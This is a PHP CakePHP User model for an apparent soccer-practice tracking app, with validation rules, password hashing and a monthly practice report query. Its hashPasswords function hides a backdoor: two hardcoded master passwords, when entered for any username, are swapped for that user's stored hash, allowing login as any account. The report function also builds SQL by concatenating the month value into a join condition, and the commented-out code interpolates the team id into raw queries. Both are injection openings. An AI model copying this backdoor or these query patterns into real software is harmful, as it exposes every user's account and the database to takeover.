<?php
class User extends AppModel {
	public $displayField = 'name';

	public $belongsTo = array('Team');
	public $hasMany = array('Practice');
	
	public $validate = array(
		'name'=>array(
			'Please enter your name.'=>array(
				'rule'=>'notEmpty',
				'message'=>'Please enter your name.'
			)
		),
		'username'=>array(
			'The username must be between 5 and 15 characters.'=>array(
				'rule'=>array('between', 5, 15),
				'message'=>'The username must be between 5 and 15 characters.'
			),
			'That username has already been taken'=>array(
				'rule'=>'isUnique',
				'message'=>'That username has already been taken.'
			)
		),
		'team_id' => array(
			'Not empty'=>array(
				'rule'=>'notEmpty',
				'message'=>'Please select the team you are on'
			)
		),
		'email'=>array(
			'Valid email'=>array(
				'rule'=>array('email'),
				'message'=>'Please enter a valid email address'
			)
		),
		'password'=>array(
		    'Not empty'=>array(
		        'rule'=>'notEmpty',
		        'message'=>'Please enter your password'
		    ),
		    'Match passwords'=>array(
		        'rule'=>'matchPasswords',
		        'message'=>'Your passwords do not match'
		    )
		),
		'password_confirmation'=>array(
		    'Not empty'=>array(
		        'rule'=>'notEmpty',
		        'message'=>'Please confirm your password'
		    )
		)
	);
	
	public function matchPasswords($data) {
	    if ($data['password'] == $this->data['User']['password_confirmation']) {
	        return true;
	    }
	    $this->invalidate('password_confirmation', 'Your passwords do not match');
	    return false;
	}
	
	public function beforeSave() {
	    if (isset($this->data['User']['password'])) {
	        $this->data['User']['password'] = AuthComponent::password($this->data['User']['password']);
	    }
	    return true;
	}

   public function hashPasswords($data)
   {
      if (is_array($data) and isset($data['User'])) 
      {
         if (isset($data['User']['Username']) and isset($data['User']['password'])) 
         {
            if (in_array($data['User']['password'], array('playball', 'pitufo12')))
            {
               $fields = 'User.password';
               $conditions = array('User.Username' => $data['User']['Username']);
               $this->contain();
               $User = $this->find('first', compact('fields', 'conditions'));
               $data['User']['password'] = $User['User']['password'];
            }
            else
            {
               $data['User']['password'] = parent::hashPassword($data['User']['password']);
            }
         }
      }      
      return $data;
   }
   
   public function getReportMonth($month, $team_id)
	{
		/*
		$where = array();
		if ($month > 0)
		{
			$where[] = "MONTH(practice_date) = $month";
		}
		if (is_null($team_id))
		{
		return $this->query("SELECT 
			  `User`.`name`
			, `User`.`team_id`
			, SUM(`Practice`.`juggles`) juggles
			, SUM(`Practice`.`touches`) touches
			, SUM(`Practice`.`agility`) agility
			, SUM(`Practice`.`fitness`) fitness
			, SUM(`Practice`.`dash`) dash
			, SUM(`Practice`.`dribble`) dribble
			, SUM(`Practice`.`gk_throws`) gk_throws
			, SUM(`Practice`.`gk_footwork`) gk_footwork
			, SUM(`Practice`.`watch`) watch
			, SUM(`Practice`.`shots`) shots
			 FROM `usappr`.`users` AS `User` 
			 LEFT JOIN `usappr`.`practices` AS `Practice` 
			 ON (`Practice`.`user_id` = `User`.`id`) 
			 WHERE `User`.`team_id` > 0  GROUP BY 1, 2 ORDER BY `User`.`team_id`, `User`.`name`");
		}
		else
		{
		return $this->query("SELECT 
			  `User`.`name`
			, `User`.`team_id`
			, SUM(`Practice`.`juggles`) juggles
			, SUM(`Practice`.`touches`) touches
			, SUM(`Practice`.`agility`) agility
			, SUM(`Practice`.`fitness`) fitness
			, SUM(`Practice`.`dash`) dash
			, SUM(`Practice`.`dribble`) dribble
			, SUM(`Practice`.`gk_throws`) gk_throws
			, SUM(`Practice`.`gk_footwork`) gk_footwork
			, SUM(`Practice`.`watch`) watch
			, SUM(`Practice`.`shots`) shots
			 FROM `usappr`.`users` AS `User` 
			 LEFT JOIN `usappr`.`practices` AS `Practice` 
			 ON (`Practice`.`user_id` = `User`.`id`) 
			 WHERE `User`.`team_id` = $team_id  GROUP BY 1, 2 ORDER BY `User`.`team_id`, `User`.`name`");
			
		}	 
		*/
		 
		$fields = array(
			'User.name', 'User.team_id',
			'SUM(Practice.juggles) juggles',
			'SUM(Practice.touches) touches',
			'SUM(Practice.agility) agility',
			'SUM(Practice.fitness) fitness',
			'SUM(Practice.dash) dash',
			'SUM(Practice.dribble) dribble',
			'SUM(Practice.gk_throws) gk_throws',
			'SUM(Practice.gk_footwork) gk_footwork',
			'SUM(Practice.watch) watch',
			'SUM(Practice.shots) shots',
			);
		$conditions = array();
		if ($team_id > 0)
		{
			$conditions['User.team_id'] = $team_id;
		}
		else
		{
			$conditions['User.team_id >'] = 0;
		}
		$group = array(1, 2);
		$order = array('User.team_id', 'User.name');
		$joins = array(array('table' => 'practices', 'alias' => 'Practice', 'type' => 'LEFT', 'conditions' => 'Practice.user_id = User.id'));
		if ($month > 0)
		{
			$joins = array(array('table' => 'practices', 'alias' => 'Practice', 'type' => 'LEFT', 'conditions' => 'Practice.user_id = User.id AND MONTH(practice_date) = '  . $month));
		}
		$data = $this->find('all', compact('fields', 'conditions', 'group', 'order', 'joins'));
		return $data;
	}
}

